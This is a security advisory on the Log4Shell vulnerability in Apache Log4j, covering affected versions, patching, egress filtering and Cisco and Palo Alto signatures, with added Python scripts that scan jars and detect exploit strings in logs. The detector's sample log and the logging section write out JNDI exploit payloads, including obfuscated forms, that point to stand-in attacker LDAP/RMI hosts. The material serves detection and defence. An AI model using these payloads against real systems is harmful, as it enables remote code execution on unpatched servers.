Critical Vulnerability in Apache Log4j

Executive Summary

A critical vulnerability has been discovered in Apache Log4j (CVE-2021-44228, commonly called "Log4Shell"), with a CVSS base score of 10.0, the maximum. The vulnerability is trivial to exploit: no authentication is needed, and the attacker only has to get a crafted string into something the application logs. Unfortunately, Apache Log4j is widespread.

Apache Log4j is an open source Java-based logging framework that is used in a very large number of Java applications, often as a dependency of a dependency that is not visible from the outside. The vulnerability therefore affects products and systems both in the cloud and on-prem.

The vulnerability is exploited by sending a specially crafted string (for example in an HTTP header, a form field or a username) to a system that logs it with Apache Log4j. Log4j's lookup feature interprets the string as a JNDI reference, makes the server connect to an attacker-controlled LDAP or RMI server, and then downloads and executes the code that server returns.

The vulnerability was publicly disclosed on December 9, 2021, so it is very new, which means that there are still many systems that are not patched or for which no patch is available yet. Many manufacturers are still examining whether their products are vulnerable or not.

Conscia will make sure to keep our customers updated via CNS and on various social media as soon as we have new information.

What do I do now?

Keep an eye out for advisories from the manufacturers and Conscia
Manufacturers are working hard to get their products tested and (if they prove to be vulnerable) create and distribute a patch against Log4j. Conscia follows this and updates you via CNS and social media.

Update your Apache Log4j
If you are maintaining a system that uses Apache Log4j, you should update to the latest version of Log4j 2. Log4j 2 from 2.0-beta9 up to and including 2.14.1 is affected. The first fix shipped in 2.15.0, but it was followed by further fixes, so do not stop at 2.15.0. If you cannot update immediately, the mitigation documented by Apache is to remove the JndiLookup class from the log4j-core jar, which disables the vulnerable lookup. Remember to check nested jars inside fat jars, wars and ears, not only jars that are installed on their own.
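To find out which jars on a server actually carry a vulnerable log4j-core, you need to open the archives (including jars bundled inside other jars and wars) and look at the version and at whether JndiLookup.class is still there. The following scanner is an added example written for this advisory; it is not Conscia's or the Apache project's code. The constructed "fat jar" at the bottom is built in memory so the script runs offline; the Maven metadata path and class path it looks for are the real ones inside log4j-core 2.x.

```python
"""Scan JAR/WAR/EAR files, including jars nested inside fat jars and wars,
for log4j-core and say whether each copy is in the CVE-2021-44228 range.
Added example for this advisory; not Conscia's or the Apache project's code."""
import io
import re
import zipfile

# Paths that exist inside every log4j-core 2.x jar (Maven metadata and the lookup class)
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0)            # first release that closes CVE-2021-44228
NESTED_EXT = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 4                 # fat jar -> war -> lib jar is plenty


def parse_version(pom_properties):
    """Return (major, minor, patch) from a pom.properties body, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.MULTILINE)
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())   # "2.0-beta9" -> (2, 0, 0)


def verdict(version, has_jndi):
    if not has_jndi:
        # The Apache-documented hot fix is deleting JndiLookup.class from the jar
        return "mitigated: JndiLookup.class absent"
    if version is None:
        return "review: JndiLookup.class present, version unknown"
    if version < FIXED:
        return "VULNERABLE: log4j-core %d.%d.%d < 2.15.0" % version
    # 2.15.0 closed CVE-2021-44228; later releases fix follow-up CVEs, so still go to the latest
    return "patched for CVE-2021-44228 (%d.%d.%d); confirm you are on the latest release" % version


def scan_archive(data, name, findings, depth=0):
    """Inspect one archive given as bytes and recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        findings.append({"archive": name, "version": version,
                         "jndi_lookup": has_jndi, "verdict": verdict(version, has_jndi)})
    if depth < MAX_DEPTH:
        for member in sorted(names):
            if member.lower().endswith(NESTED_EXT):
                scan_archive(zf.read(member), name + "!" + member, findings, depth + 1)
    return findings


def scan_file(path):
    """Scan one archive on disk; returns a list of findings (empty if no log4j-core)."""
    with open(path, "rb") as f:
        return scan_archive(f.read(), path, [])


def make_archive(members):
    """Build a zip in memory from {path: bytes_or_str}; used to construct sample jars."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, body in members.items():
            zf.writestr(path, body)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a Spring Boot style fat jar bundling a vulnerable log4j-core 2.14.1
    vulnerable = make_archive({POM_PROPS: "version=2.14.1\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
    fat_jar = make_archive({"BOOT-INF/lib/log4j-core-2.14.1.jar": vulnerable})
    for hit in scan_archive(fat_jar, "app.jar", []):
        print(hit["archive"], "->", hit["verdict"])
```

Run it over every *.jar, *.war and *.ear on a host (for example with find piped into scan_file) and treat both "VULNERABLE" and "review" results as work items. Log4j 1.x uses different paths and is not in scope for this CVE, so the scanner deliberately ignores it.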

Create a whitelist of Internet traffic from your servers
The code that is executed is fetched from an attacker-controlled server on the Internet. If your servers cannot reach arbitrary Internet hosts, the most common exploitation path is broken. You should therefore create rules in your NGFW, proxy or Umbrella with a whitelist of traffic from the servers towards legitimate update servers (Windows Update etc.) and, if these are not hosted locally, DNS, NTP etc. All other outbound traffic should be blocked. Note that this is a mitigation that buys time, not a fix: the vulnerable lookup is still triggered, and an attacker can for example still leak data through DNS queries, so the servers must still be patched.

Logging
Keep an eye on the logs of your firewall, your network and your servers in the coming period. The vulnerability is being actively exploited, and not every attack surface has been identified yet. Look in particular for the string ${jndi: and obfuscated variants of it (for example with ${lower:j} or ${::-j} in place of letters) in anything that ends up in application logs: HTTP headers such as User-Agent, query parameters, form fields and usernames. Conscia can also help keep an eye on your logs. Contact your account manager for more information.
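Searching logs for the literal text ${jndi: misses the obfuscated payloads that were in circulation within hours of the disclosure, because Log4j resolves nested lookups such as ${${lower:j}ndi:...} before it interprets the result. The detector below collapses those lookups the same way before matching, so the attack described in the summary above is found whichever way it is written. It is an added example written for this advisory, not Conscia's code or a vendor signature; the access-log lines are constructed and use documentation addresses (203.0.113.0/24, example.net).

```python
"""Find CVE-2021-44228 exploit attempts in web-server access logs, including the
obfuscated forms attackers use to evade naive '${jndi:' matching.
Added example for this advisory, not Conscia's code; the log lines are constructed
and use documentation addresses (203.0.113.0/24, example.net)."""
import re
from urllib.parse import unquote

# Innermost ${...} that is not itself the jndi lookup we want to keep and report
INNER_LOOKUP = re.compile(r"\$\{(?!jndi:)([^${}]*)\}", re.IGNORECASE)
# The resolved payload: ${jndi:<scheme>://<host[:port]>/...}
JNDI_REF = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]*)", re.IGNORECASE)

# Constructed sample access log: lines 1 and 7 are benign, lines 2 to 6 are exploit attempts
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.6:1099/x}"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.net%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "${${env:NOTEXIST:-j}ndi:ldaps://203.0.113.7/a}" "Mozilla/5.0"',
    '203.0.113.16 - - [10/Dec/2021:12:00:07 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def resolve_lookup(expr):
    """Evaluate one innermost lookup the way Log4j 2.x would for the forms used in
    obfuscation: ${lower:x}, ${upper:x} and the ${name:key:-default} fallback."""
    if ":-" in expr:                        # ${::-j} or ${env:NOTEXIST:-j} -> "j"
        return expr.split(":-", 1)[1]
    name, _, arg = expr.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return ""   # env/sys/date/... cannot be known offline; drop them, erring towards detection


def normalize(text):
    """URL-decode, then collapse nested lookups until only a literal ${jndi:...} (if any) remains."""
    text = unquote(text)
    for _ in range(200):                    # every pass shortens the string, so this terminates
        collapsed = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect(line):
    """Return {'scheme', 'target', 'normalized'} for an exploit attempt, else None."""
    normalized = normalize(line)
    m = JNDI_REF.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "target": m.group(2), "normalized": normalized}


def scan_lines(lines):
    """Run detect() over an iterable of log lines; 1-based line numbers in the result."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        found = detect(line)
        if found:
            found["line"] = lineno
            hits.append(found)
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print("line %d: %s -> %s" % (hit["line"], hit["scheme"], hit["target"]))
```

The "target" field gives you the attacker's callback host, which is exactly what you want to search for next in firewall and DNS logs: an outbound connection from a server to that host on the LDAP/RMI port means the lookup fired and the host needs incident response, not just patching.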

For Cisco customers:

  • For customers using Cisco Firepower NGFW, Cisco has released Snort 2 and Snort 3 rules that can detect and block the attack. You should verify that the rules are downloaded and deployed on your Firepower device. Talos states: "Talos is releasing Snort 2 SIDs 58722-58733 and Snort 3 SIDs: 300055-300057 to address CVE-2021-44228, an RCE vulnerability in the Apache Log4j API."
    Source: https://www.snort.org/advisories/talos-rules-2021-12-10
  • TLS (SSL) decryption is required for these rules to see exploit attempts inside encrypted sessions. If decryption is not possible, you should create a whitelist of FQDNs / URLs that your servers may reach on the Internet, so that your systems cannot download the malicious software, or you should implement Secure Endpoint / Umbrella.
  • Cisco Secure Endpoint (AMP for Endpoint) can block attempts to exploit this vulnerability.
  • Cisco Umbrella can block access to malicious domains, IPs, and URLs.

Cisco has many products and is still investigating which of them are potentially vulnerable. Cisco keeps the following advisory about its products updated:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd#vp

For Palo Alto customers:

  • Customers with Next-Generation Firewalls with an active Threat Prevention security subscription can detect and block sessions with the following Threat IDs:
      - 91991 (initially released with Applications and Threats content update version 8498 and further enhanced with version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.
      - 91994 and 91995 (released with Applications and Threats content version 8500).
    TLS (SSL) decryption is required for these signatures to see exploit attempts inside encrypted sessions. If this is not possible, you should create a whitelist of FQDNs / URLs that your servers may reach on the Internet, so that your systems cannot download the malicious software, or you should implement Cortex XDR.
  • Cortex XDR is protected through Behavioral Threat Protection (BTP) with the exception of Cortex on Linux, which is protected by the content package 290-78377.
  • Cortex XSOAR customers can take advantage of the “CVE-2021-44228 – Log4j RCE” package to automatically detect and mitigate the vulnerability.
  • Prisma Cloud Compute Defender agents can detect CI projects, container images and host systems that contain a vulnerable Log4j package.

Source: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

You can find more information here:

You can also read our Swedish blog post and our Dutch blog post about the Log4j vulnerability. If you have any questions or concerns, you are welcome to contact your local Conscia office.
